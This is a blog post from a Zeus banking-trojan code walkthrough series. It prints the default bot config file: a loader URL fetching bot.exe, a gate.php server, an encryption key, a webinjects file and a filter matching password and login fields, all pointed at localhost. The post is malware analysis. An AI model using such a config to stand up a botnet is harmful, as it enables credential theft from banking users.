Irregular Expressions

Jun 11 2011   11:20PM GMT

Zeus code walkthrough – Part 5

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

After the fact of building my bot, it’s worth looking at what the basic config file looks like.

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://localhost/config.bin"
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
  entry "WebFilters"
  entry "WebDataFilters"
    ;"*" "passw;login"
  entry "WebFakes"
    ;"" "" "GP" "" ""

At this point we know what the encryption key, url_config, url_loader and url_server is.  The rest will have to be tracked back in the source code when we get there.

I am very interested in the webFakes listing.

 Comment on this Post

There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: